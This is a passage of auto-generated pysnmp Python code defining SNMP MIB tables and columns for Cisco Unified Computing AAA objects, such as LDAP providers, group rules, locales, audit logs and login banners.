cucsAaaLdapEpFsmCurrentFsm = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 45, 1, 5), CucsAaaLdapEpFsmCurrentFsm()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFsmCurrentFsm.setStatus('current')
cucsAaaLdapEpFsmDescrData = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 45, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFsmDescrData.setStatus('current')
cucsAaaLdapEpFsmFsmStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 45, 1, 7), CucsFsmFsmStageStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFsmFsmStatus.setStatus('current')
cucsAaaLdapEpFsmProgress = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 45, 1, 8), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFsmProgress.setStatus('current')
cucsAaaLdapEpFsmRmtErrCode = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 45, 1, 9), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFsmRmtErrCode.setStatus('current')
cucsAaaLdapEpFsmRmtErrDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 45, 1, 10), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFsmRmtErrDescr.setStatus('current')
cucsAaaLdapEpFsmRmtRslt = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 45, 1, 11), CucsConditionRemoteInvRslt()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFsmRmtRslt.setStatus('current')
cucsAaaLdapEpFsmStageTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 46), )
if mibBuilder.loadTexts: cucsAaaLdapEpFsmStageTable.setStatus('current')
cucsAaaLdapEpFsmStageEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 46, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaLdapEpFsmStageInstanceId"))
if mibBuilder.loadTexts: cucsAaaLdapEpFsmStageEntry.setStatus('current')
cucsAaaLdapEpFsmStageInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 46, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaLdapEpFsmStageInstanceId.setStatus('current')
cucsAaaLdapEpFsmStageDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 46, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFsmStageDn.setStatus('current')
cucsAaaLdapEpFsmStageRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 46, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFsmStageRn.setStatus('current')
cucsAaaLdapEpFsmStageDescrData = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 46, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFsmStageDescrData.setStatus('current')
cucsAaaLdapEpFsmStageLastUpdateTime = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 46, 1, 5), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFsmStageLastUpdateTime.setStatus('current')
cucsAaaLdapEpFsmStageName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 46, 1, 6), CucsAaaLdapEpFsmStageName()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFsmStageName.setStatus('current')
cucsAaaLdapEpFsmStageOrder = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 46, 1, 7), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFsmStageOrder.setStatus('current')
cucsAaaLdapEpFsmStageRetry = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 46, 1, 8), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFsmStageRetry.setStatus('current')
cucsAaaLdapEpFsmStageStageStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 46, 1, 9), CucsFsmFsmStageStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFsmStageStageStatus.setStatus('current')
cucsAaaLdapGroupTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 12), )
if mibBuilder.loadTexts: cucsAaaLdapGroupTable.setStatus('current')
cucsAaaLdapGroupEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 12, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaLdapGroupInstanceId"))
if mibBuilder.loadTexts: cucsAaaLdapGroupEntry.setStatus('current')
cucsAaaLdapGroupInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 12, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaLdapGroupInstanceId.setStatus('current')
cucsAaaLdapGroupDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 12, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapGroupDn.setStatus('current')
cucsAaaLdapGroupRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 12, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapGroupRn.setStatus('current')
cucsAaaLdapGroupDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 12, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapGroupDescr.setStatus('current')
cucsAaaLdapGroupName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 12, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapGroupName.setStatus('current')
cucsAaaLdapGroupRuleTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 13), )
if mibBuilder.loadTexts: cucsAaaLdapGroupRuleTable.setStatus('current')
cucsAaaLdapGroupRuleEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 13, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaLdapGroupRuleInstanceId"))
if mibBuilder.loadTexts: cucsAaaLdapGroupRuleEntry.setStatus('current')
cucsAaaLdapGroupRuleInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 13, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaLdapGroupRuleInstanceId.setStatus('current')
cucsAaaLdapGroupRuleDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 13, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapGroupRuleDn.setStatus('current')
cucsAaaLdapGroupRuleRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 13, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapGroupRuleRn.setStatus('current')
cucsAaaLdapGroupRuleAuthorization = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 13, 1, 4), CucsAaaLdapGroupRuleAuthorization()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapGroupRuleAuthorization.setStatus('current')
cucsAaaLdapGroupRuleDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 13, 1, 5), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapGroupRuleDescr.setStatus('current')
cucsAaaLdapGroupRuleName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 13, 1, 7), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapGroupRuleName.setStatus('current')
cucsAaaLdapGroupRuleTargetAttr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 13, 1, 8), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapGroupRuleTargetAttr.setStatus('current')
cucsAaaLdapGroupRuleTraversal = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 13, 1, 9), CucsAaaLdapGroupRuleTraversal()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapGroupRuleTraversal.setStatus('current')
cucsAaaLdapGroupRuleUsePrimaryGroup = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 13, 1, 10), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapGroupRuleUsePrimaryGroup.setStatus('current')
cucsAaaLdapProviderTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 14), )
if mibBuilder.loadTexts: cucsAaaLdapProviderTable.setStatus('current')
cucsAaaLdapProviderEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 14, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaLdapProviderInstanceId"))
if mibBuilder.loadTexts: cucsAaaLdapProviderEntry.setStatus('current')
cucsAaaLdapProviderInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 14, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaLdapProviderInstanceId.setStatus('current')
cucsAaaLdapProviderDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 14, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapProviderDn.setStatus('current')
cucsAaaLdapProviderRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 14, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapProviderRn.setStatus('current')
cucsAaaLdapProviderAttribute = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 14, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapProviderAttribute.setStatus('current')
cucsAaaLdapProviderBasedn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 14, 1, 5), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapProviderBasedn.setStatus('current')
cucsAaaLdapProviderDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 14, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapProviderDescr.setStatus('current')
cucsAaaLdapProviderEnableSSL = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 14, 1, 7), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapProviderEnableSSL.setStatus('current')
cucsAaaLdapProviderEncKey = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 14, 1, 8), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapProviderEncKey.setStatus('current')
cucsAaaLdapProviderFilter = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 14, 1, 9), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapProviderFilter.setStatus('current')
cucsAaaLdapProviderKey = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 14, 1, 11), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapProviderKey.setStatus('current')
cucsAaaLdapProviderKeySet = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 14, 1, 12), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapProviderKeySet.setStatus('current')
cucsAaaLdapProviderName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 14, 1, 13), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapProviderName.setStatus('current')
cucsAaaLdapProviderOrder = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 14, 1, 14), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapProviderOrder.setStatus('current')
cucsAaaLdapProviderPort = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 14, 1, 15), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapProviderPort.setStatus('current')
cucsAaaLdapProviderRetries = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 14, 1, 16), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapProviderRetries.setStatus('current')
cucsAaaLdapProviderRootdn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 14, 1, 17), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapProviderRootdn.setStatus('current')
cucsAaaLdapProviderTimeout = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 14, 1, 18), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapProviderTimeout.setStatus('current')
cucsAaaLdapProviderVendor = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 14, 1, 19), CucsAaaLdapVendor()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapProviderVendor.setStatus('current')
cucsAaaLocaleTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 15), )
if mibBuilder.loadTexts: cucsAaaLocaleTable.setStatus('current')
cucsAaaLocaleEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 15, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaLocaleInstanceId"))
if mibBuilder.loadTexts: cucsAaaLocaleEntry.setStatus('current')
cucsAaaLocaleInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 15, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaLocaleInstanceId.setStatus('current')
cucsAaaLocaleDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 15, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLocaleDn.setStatus('current')
cucsAaaLocaleRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 15, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLocaleRn.setStatus('current')
cucsAaaLocaleDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 15, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLocaleDescr.setStatus('current')
cucsAaaLocaleIntId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 15, 1, 5), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLocaleIntId.setStatus('current')
cucsAaaLocaleName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 15, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLocaleName.setStatus('current')
cucsAaaLocaleConfigState = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 15, 1, 7), CucsAaaConfigState()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLocaleConfigState.setStatus('current')
cucsAaaLocaleConfigStatusMessage = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 15, 1, 8), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLocaleConfigStatusMessage.setStatus('current')
cucsAaaLocalePolicyLevel = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 15, 1, 9), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLocalePolicyLevel.setStatus('current')
cucsAaaLocalePolicyOwner = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 15, 1, 10), CucsPolicyPolicyOwner()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLocalePolicyOwner.setStatus('current')
cucsAaaLogTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 16), )
if mibBuilder.loadTexts: cucsAaaLogTable.setStatus('current')
cucsAaaLogEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 16, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaLogInstanceId"))
if mibBuilder.loadTexts: cucsAaaLogEntry.setStatus('current')
cucsAaaLogInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 16, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaLogInstanceId.setStatus('current')
cucsAaaLogDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 16, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLogDn.setStatus('current')
cucsAaaLogRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 16, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLogRn.setStatus('current')
cucsAaaLogMaxSize = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 16, 1, 4), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLogMaxSize.setStatus('current')
cucsAaaLogPurgeWindow = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 16, 1, 5), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLogPurgeWindow.setStatus('current')
cucsAaaLogSize = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 16, 1, 6), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLogSize.setStatus('current')
cucsAaaModLRTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 17), )
if mibBuilder.loadTexts: cucsAaaModLRTable.setStatus('current')
cucsAaaModLREntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 17, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaModLRInstanceId"))
if mibBuilder.loadTexts: cucsAaaModLREntry.setStatus('current')
cucsAaaModLRInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 17, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaModLRInstanceId.setStatus('current')
cucsAaaModLRDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 17, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaModLRDn.setStatus('current')
cucsAaaModLRRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 17, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaModLRRn.setStatus('current')
cucsAaaModLRAffected = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 17, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaModLRAffected.setStatus('current')
cucsAaaModLRCause = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 17, 1, 5), CucsConditionCause()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaModLRCause.setStatus('current')
cucsAaaModLRChangeSet = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 17, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaModLRChangeSet.setStatus('current')
cucsAaaModLRCode = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 17, 1, 7), CucsConditionCode()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaModLRCode.setStatus('current')
cucsAaaModLRCreated = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 17, 1, 8), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaModLRCreated.setStatus('current')
cucsAaaModLRDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 17, 1, 9), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaModLRDescr.setStatus('current')
cucsAaaModLRId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 17, 1, 10), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaModLRId.setStatus('current')
cucsAaaModLRInd = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 17, 1, 11), CucsConditionActionIndicator()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaModLRInd.setStatus('current')
cucsAaaModLRSeverity = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 17, 1, 12), CucsConditionSeverity()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaModLRSeverity.setStatus('current')
cucsAaaModLRTrig = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 17, 1, 13), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaModLRTrig.setStatus('current')
cucsAaaModLRTxId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 17, 1, 14), Unsigned64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaModLRTxId.setStatus('current')
cucsAaaModLRUser = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 17, 1, 15), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaModLRUser.setStatus('current')
cucsAaaModLRSessionId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 17, 1, 16), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaModLRSessionId.setStatus('current')
cucsAaaOrgTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 18), )
if mibBuilder.loadTexts: cucsAaaOrgTable.setStatus('current')
cucsAaaOrgEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 18, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaOrgInstanceId"))
if mibBuilder.loadTexts: cucsAaaOrgEntry.setStatus('current')
cucsAaaOrgInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 18, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaOrgInstanceId.setStatus('current')
cucsAaaOrgDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 18, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaOrgDn.setStatus('current')
cucsAaaOrgRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 18, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaOrgRn.setStatus('current')
cucsAaaOrgDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 18, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaOrgDescr.setStatus('current')
cucsAaaOrgName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 18, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaOrgName.setStatus('current')
cucsAaaOrgOrgDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 18, 1, 7), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaOrgOrgDn.setStatus('current')
cucsAaaOrgConfigState = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 18, 1, 8), CucsAaaConfigState()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaOrgConfigState.setStatus('current')
cucsAaaOrgConfigStatusMessage = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 18, 1, 9), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaOrgConfigStatusMessage.setStatus('current')
cucsAaaPreLoginBannerTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 38), )
if mibBuilder.loadTexts: cucsAaaPreLoginBannerTable.setStatus('current')
cucsAaaPreLoginBannerEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 38, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaPreLoginBannerInstanceId"))
if mibBuilder.loadTexts: cucsAaaPreLoginBannerEntry.setStatus('current')
cucsAaaPreLoginBannerInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 38, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaPreLoginBannerInstanceId.setStatus('current')
cucsAaaPreLoginBannerDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 38, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaPreLoginBannerDn.setStatus('current')
cucsAaaPreLoginBannerRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 38, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaPreLoginBannerRn.setStatus('current')
cucsAaaPreLoginBannerDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 38, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaPreLoginBannerDescr.setStatus('current')
cucsAaaPreLoginBannerIntId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 38, 1, 5), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaPreLoginBannerIntId.setStatus('current')
cucsAaaPreLoginBannerMessage = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 38, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaPreLoginBannerMessage.setStatus('current')
cucsAaaPreLoginBannerName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 38, 1, 7), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaPreLoginBannerName.setStatus('current')
cucsAaaPreLoginBannerPolicyLevel = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 38, 1, 8), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaPreLoginBannerPolicyLevel.setStatus('current')
cucsAaaPreLoginBannerPolicyOwner = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 38, 1, 9), CucsPolicyPolicyOwner()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaPreLoginBannerPolicyOwner.setStatus('current')
cucsAaaProviderGroupTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 19), )
if mibBuilder.loadTexts: cucsAaaProviderGroupTable.setStatus('current')
cucsAaaProviderGroupEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 19, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaProviderGroupInstanceId"))
if mibBuilder.loadTexts: cucsAaaProviderGroupEntry.setStatus('current')
cucsAaaProviderGroupInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 19, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaProviderGroupInstanceId.setStatus('current')
cucsAaaProviderGroupDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 19, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
